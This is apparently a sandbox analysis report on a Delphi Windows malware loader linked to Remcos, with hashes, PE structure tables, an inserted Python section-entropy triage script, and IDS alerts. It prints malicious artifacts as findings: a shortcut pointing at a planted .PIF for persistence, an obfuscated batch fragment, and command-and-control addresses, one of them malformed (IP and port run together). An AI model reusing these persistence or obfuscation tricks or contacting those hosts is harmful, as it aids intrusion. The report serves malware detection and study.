                                      SSDEEP:12288:TyHmkj2HDDmuHWqPmcGlkstY3iJ6CQbq2H7WSq8IMn0h8OYRBl3VjUcSxxi1nHW8:0mI2HXUqPmcjspQJH080fYXvjUtxs1nZ
                                      MD5:64DFA7CDDE27CCEDA300AB081CF06234
                                      SHA1:866575CB500CE84CE317AE9D7E23A24A85728E10
                                      SHA-256:55190F72FAD2778CF0C2D766B523377938D5EF290D007F37F037DE8AB9273E08
                                      SHA-512:908272FDD102BE05D42E1CE76FA5DA318379A7E179642CD3E361F2A8A128B78A79D67F688D8BFABD63195F6AF8152AD5C3C87429A29F0DE49066E2CE3C0EB0D6
                                      Malicious:true
                                      Reputation:low
                                      Preview:...Y#..K.....$.%&...........%&&%$#&....%...%#... !...%$..$.....#.'....%.&"!...%.....Y#..K.......!..%...Y#..K..........................................................................................................................................................................................................................................................................................................................................................................................................................................................@...7.[.1...A.....................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\MeP66xi1AM.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):952320
                                      Entropy (8bit):7.0393696567543405
                                      Encrypted:false
                                      SSDEEP:24576:R7sP5Kw0G1OAc8msbN0o2IDGHfPMFQJQI/zN:R8o9G1bTcfPMFQJQI/zN
                                      MD5:F8CDBDF8318C11C2E3E286195F067042
                                      SHA1:AF9C826E25D7D9242C5957CF753AF46DCB45FD33
                                      SHA-256:B9803B83ED42E8F63E73719CFFFEFF30ECFABECA676A3A04A087754E2608A1C5
                                      SHA-512:CF30201667EBB76ABB9ADBED69AFC2112385B6581449C496014A4C33328E7243531E13403384B3A9894BE60C4029FA5DE5A49133EA7465FC8E034B0C8CD3B74E
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 53%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................f.......7.......@....@..............................................@..............................x&...`...........................m..................................................@................................text...(........................... ..`.itext.......0...................... ..`.data........@......."..............@....bss....t8...`.......@...................idata..x&.......(...@..............@....tls....4............h...................rdata...............h..............@..@.reloc...m.......n...j..............@..B.rsrc........`......................@..@....................................@..@................................................................................................
                                      Process:C:\Users\user\Desktop\MeP66xi1AM.exe
                                      File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Wnbcdrjt.PIF">), ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):104
                                      Entropy (8bit):5.130245247505056
                                      Encrypted:false
                                      SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM5vLeysbxLYXA6ov:HRYFVmTWDyzcfEx/6y
                                      MD5:93915DBEB73B30A06B6523F7DCAA9F54
                                      SHA1:6167009939F298EA606557A9CDC8399A5CDD7B00
                                      SHA-256:5CC1D065043546917E1DB235511B3AA0DD26AF10B986F666A35430FDC81DFD1E
                                      SHA-512:A716724E7E818B5465992CA49DC95347D4EB32F8D9DC1C5B3768D245A08B9621443F0E815B1AD22E5965B692205B76BD4F5FCA6194F9F485F503F8918BFE4306
                                      Malicious:true
                                      Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Wnbcdrjt.PIF"..IconIndex=917626..HotKey=83..
                                      Process:C:\Users\user\Desktop\MeP66xi1AM.exe
                                      File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):15789
                                      Entropy (8bit):4.658965888116939
                                      Encrypted:false
                                      SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                      MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                      SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                      SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                      SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                      Malicious:false
                                      Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.0393696567543405
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.81%
                                      • Windows Screen Saver (13104/52) 0.13%
                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      File name:MeP66xi1AM.exe
                                      File size:952'320 bytes
                                      MD5:f8cdbdf8318c11c2e3e286195f067042
                                      SHA1:af9c826e25d7d9242c5957cf753af46dcb45fd33
                                      SHA256:b9803b83ed42e8f63e73719cfffeff30ecfabeca676a3a04a087754e2608a1c5
                                      SHA512:cf30201667ebb76abb9adbed69afc2112385b6581449c496014a4c33328e7243531e13403384b3a9894be60c4029fa5de5a49133ea7465fc8e034b0c8cd3b74e
                                      SSDEEP:24576:R7sP5Kw0G1OAc8msbN0o2IDGHfPMFQJQI/zN:R8o9G1bTcfPMFQJQI/zN
                                      TLSH:99158E32E0606932DD15D5FC4CB2D6E85816BD323F37EC97FAB03D59AA39A446C29183
                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                      Icon Hash:1f7effffffffff3f
                                      Entrypoint:0x4637b4
                                      Entrypoint Section:.itext
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                      DLL Characteristics:
                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:8e7f521f07f899da88391b86f035a0e3
                                      Instruction
                                      push ebp
                                      mov ebp, esp
                                      add esp, FFFFFFF0h
                                      mov eax, 004621F0h
                                      call 00007F42950B04E1h
                                      mov eax, dword ptr [00465BF0h]
                                      mov eax, dword ptr [eax]
                                      call 00007F4295103BC9h
                                      mov ecx, dword ptr [00465CECh]
                                      mov eax, dword ptr [00465BF0h]
                                      mov eax, dword ptr [eax]
                                      mov edx, dword ptr [0046182Ch]
                                      call 00007F4295103BC9h
                                      mov eax, dword ptr [00465BF0h]
                                      mov eax, dword ptr [eax]
                                      call 00007F4295103C3Dh
                                      call 00007F42950AE25Ch
                                      lea eax, dword ptr [eax+00h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
add byte ptr [eax], al   (this instruction, the decoding of two 0x00 bytes, repeats unchanged for the rest of the listing)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6a000 | 0x2678 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x76000 | 0x7b000 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6f000 | 0x6dc8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x6e000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x6a740 | 0x600 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x61428 | 0x61600 | 2161b7febbf1b940be5c4e4c60e97b79 | False | 0.5204463855905006 | data | 6.5251229505952315 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x63000 | 0x7fc | 0x800 | ffb4ea912e3359488468bf9aaca0fb82 | False | 0.6328125 | data | 6.217385141335654 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x64000 | 0x1d90 | 0x1e00 | 232e22816e981f6fd08d561b5d49b914 | False | 0.400390625 | data | 3.8047431055440146 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x66000 | 0x3874 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x6a000 | 0x2678 | 0x2800 | 8d31ecdf7109ecf07a514ce35e6f1ebd | False | 0.308984375 | data | 5.092633401959705 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x6d000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x6e000 | 0x18 | 0x200 | c3fa9ea58e8ba23d6c97449063988857 | False | 0.05078125 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6f000 | 0x6dc8 | 0x6e00 | b273c9477ef7ab10309b8aee3665c724 | False | 0.6352627840909091 | data | 6.678821577889799 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x76000 | 0x7b000 | 0x7b000 | a024c99cb615edc54506cf5d118121bf | False | 0.4176809419461382 | data | 6.788468749924133 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
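The section table above is what a static triage of this sample turns on: a Delphi-style layout (.text, .itext, .data, .bss, .idata, .tls, .rdata, .reloc, .rsrc), no section that is both writable and executable, two sections with a raw size of 0 (.bss and .tls, which is normal for uninitialised data), and a .rsrc section of 0x7b000 bytes at entropy 6.79, which the resource table further down shows is almost entirely one 0x719f4-byte RT_RCDATA entry. The script below is an added example and not code from the report or from Joe Sandbox: it parses the section headers of a PE from the raw bytes, computes per-section Shannon entropy on the same 0-8 bit scale as the Entropy column, and flags the pattern that stands out here (a large, high-entropy non-code section) plus one that does not occur here but is cheap to check (a writable and executable section). It fabricates a small PE in memory so it runs offline; the size and entropy thresholds are assumed values, not figures from the report.

```python
"""Section-table triage for a PE file, standard library only.

Added example (not code from the report or from Joe Sandbox): parse the
section headers the way the table above was built, compute Shannon entropy
per section and flag what a loader like this one makes you look for.
build_demo_pe() fabricates a small PE so the script runs offline; the
thresholds are assumptions, not values taken from the report.
"""
import math
import random
import struct
import sys

ENTROPY_HIGH = 6.5          # assumed: encrypted/compressed data usually sits above this
LARGE_SECTION = 0x10000     # assumed: ignore small high-entropy blobs such as icons
SCN_CODE, SCN_INIT_DATA = 0x00000020, 0x00000040
SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000
SECTION_HDR = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly random bytes."""
    if not buf:
        return 0.0
    n = len(buf)
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """Return [(name, vaddr, vsize, raw_off, raw_size, characteristics), ...]."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsect, = struct.unpack_from("<H", pe, e_lfanew + 6)        # FileHeader.NumberOfSections
    opt_size, = struct.unpack_from("<H", pe, e_lfanew + 20)    # FileHeader.SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                            # section table follows the optional header
    out = []
    for i in range(nsect):
        name, vsize, vaddr, rsize, roff, _, _, _, _, chars = struct.unpack_from(SECTION_HDR, pe, table + 40 * i)
        out.append((name.rstrip(b"\0").decode("ascii", "replace"), vaddr, vsize, roff, rsize, chars))
    return out


def section_entropies(pe: bytes) -> dict:
    """Entropy of each section's raw bytes (sections with no raw data score 0.0)."""
    return {name: shannon_entropy(pe[roff:roff + rsize] if rsize else b"")
            for name, _, _, roff, rsize, _ in parse_sections(pe)}


def triage(pe: bytes) -> list:
    """Findings as (section, reason) pairs."""
    findings = []
    entropies = section_entropies(pe)
    for name, _, _, _, rsize, chars in parse_sections(pe):
        if chars & SCN_WRITE and chars & SCN_EXECUTE:
            findings.append((name, "writable and executable"))
        if rsize >= LARGE_SECTION and entropies[name] >= ENTROPY_HIGH and not chars & SCN_CODE:
            findings.append((name, f"large high-entropy data section: {rsize:#x} bytes, H={entropies[name]:.2f}"))
    return findings


def build_demo_pe() -> bytes:
    """Constructed 32-bit PE with three sections; the payload section is seeded random data."""
    rng = random.Random(2024)
    sections = [  # name, virtual size, raw bytes, characteristics
        (b".text", 0x400, b"\x90" * 0x300 + b"\xCC" * 0x100, SCN_CODE | SCN_EXECUTE | SCN_READ),
        (b".bss", 0x3874, b"", SCN_READ | SCN_WRITE),                      # raw size 0, like the .bss above
        (b".rsrc", 0x10000, bytes(rng.getrandbits(8) for _ in range(0x10000)),  # stand-in for an encrypted blob
         SCN_INIT_DATA | SCN_READ),
    ]
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x0102)
    optional = struct.pack("<H", 0x10B) + bytes(0xE0 - 2)          # PE32 magic, remainder zeroed
    first_raw = (0x40 + 4 + len(coff) + len(optional) + 40 * len(sections) + 0x1FF) & ~0x1FF
    raw_off, vaddr, table, blobs = first_raw, 0x1000, b"", b""
    for name, vsize, raw, chars in sections:
        rsize = (len(raw) + 0x1FF) & ~0x1FF                         # 0x200 file alignment
        table += struct.pack(SECTION_HDR, name, vsize, vaddr, rsize, raw_off if rsize else 0, 0, 0, 0, 0, chars)
        blobs += raw.ljust(rsize, b"\0")
        raw_off += rsize
        vaddr += (max(vsize, rsize) + 0xFFF) & ~0xFFF               # 0x1000 section alignment
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)             # e_lfanew = 0x40
    return (dos + b"PE\0\0" + coff + optional + table).ljust(first_raw, b"\0") + blobs


if __name__ == "__main__":
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_demo_pe()
    for name, h in section_entropies(image).items():
        print(f"{name:<8} H={h:.2f}")
    for name, reason in triage(image):
        print(f"[!] {name}: {reason}")
```

Run it with a file path to triage a real PE, or without arguments to see the constructed one flagged on its .rsrc section. The entropy of .rsrc alone does not say whether the blob is a packed payload, a compressed image or a certificate; it says where to look next, which for a Delphi loader is the RT_RCDATA entries in the resource table.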
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x76b50 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x76c84 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x76db8 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x76eec | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x77020 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x77154 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x77288 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0x773bc | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x7758c | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
RT_BITMAP | 0x77770 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x77940 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
RT_BITMAP | 0x77b10 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
RT_BITMAP | 0x77ce0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
RT_BITMAP | 0x77eb0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
RT_BITMAP | 0x78080 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x78250 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
RT_BITMAP | 0x78420 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x785f0 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
RT_ICON | 0x786d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 1889 x 1889 px/m | | | 0.4228723404255319
RT_ICON | 0x78b40 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 1889 x 1889 px/m | | | 0.29918032786885246
RT_ICON | 0x794c8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 1889 x 1889 px/m | | | 0.2535178236397749
RT_ICON | 0x7a570 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m | | | 0.18329875518672198
RT_DIALOG | 0x7cb18 | 0x52 | data | | | 0.7682926829268293
RT_DIALOG | 0x7cb6c | 0x52 | data | | | 0.7560975609756098
RT_STRING | 0x7cbc0 | 0x178 | data | | | 0.4946808510638298
RT_STRING | 0x7cd38 | 0x2d8 | data | | | 0.4684065934065934
RT_STRING | 0x7d010 | 0xb4 | data | | | 0.6888888888888889
RT_STRING | 0x7d0c4 | 0xe8 | data | | | 0.6422413793103449
RT_STRING | 0x7d1ac | 0x2a8 | data | | | 0.4764705882352941
RT_STRING | 0x7d454 | 0x3e8 | data | | | 0.382
RT_STRING | 0x7d83c | 0x370 | data | | | 0.4022727272727273
RT_STRING | 0x7dbac | 0x3cc | data | | | 0.33539094650205764
RT_STRING | 0x7df78 | 0x214 | data | | | 0.49624060150375937
RT_STRING | 0x7e18c | 0xcc | data | | | 0.6274509803921569
RT_STRING | 0x7e258 | 0x194 | data | | | 0.5643564356435643
RT_STRING | 0x7e3ec | 0x3c4 | data | | | 0.3288381742738589
RT_STRING | 0x7e7b0 | 0x338 | data | | | 0.42961165048543687
RT_STRING | 0x7eae8 | 0x294 | data | | | 0.42424242424242425
RT_RCDATA | 0x7ed7c | 0x10 | data | | | 1.5
RT_RCDATA | 0x7ed8c | 0x2cc | data | | | 0.729050279329609
RT_RCDATA | 0x7f058 | 0x719f4 | data | English | United States | 0.42970932281326013
RT_RCDATA | 0xf0a4c | 0x4a0 | Delphi compiled form 'TForm1' | | | 0.47128378378378377
RT_GROUP_CURSOR | 0xf0eec | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0xf0f00 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0xf0f14 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0xf0f28 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0xf0f3c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0xf0f50 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0xf0f64 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0xf0f78 | 0x3e | data | | | 0.8709677419354839
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtectEx, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
oleaut32.dll | GetErrorInfo, SysFreeString
ole32.dll | CoUninitialize, CoInitialize
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP / Port | Protocol
2024-12-17T19:47:03.077202+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49708 | 23.237.50.106 / 443 | TCP
2024-12-17T19:47:18.570061+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49710 | 192.169.69.264610 | TCP
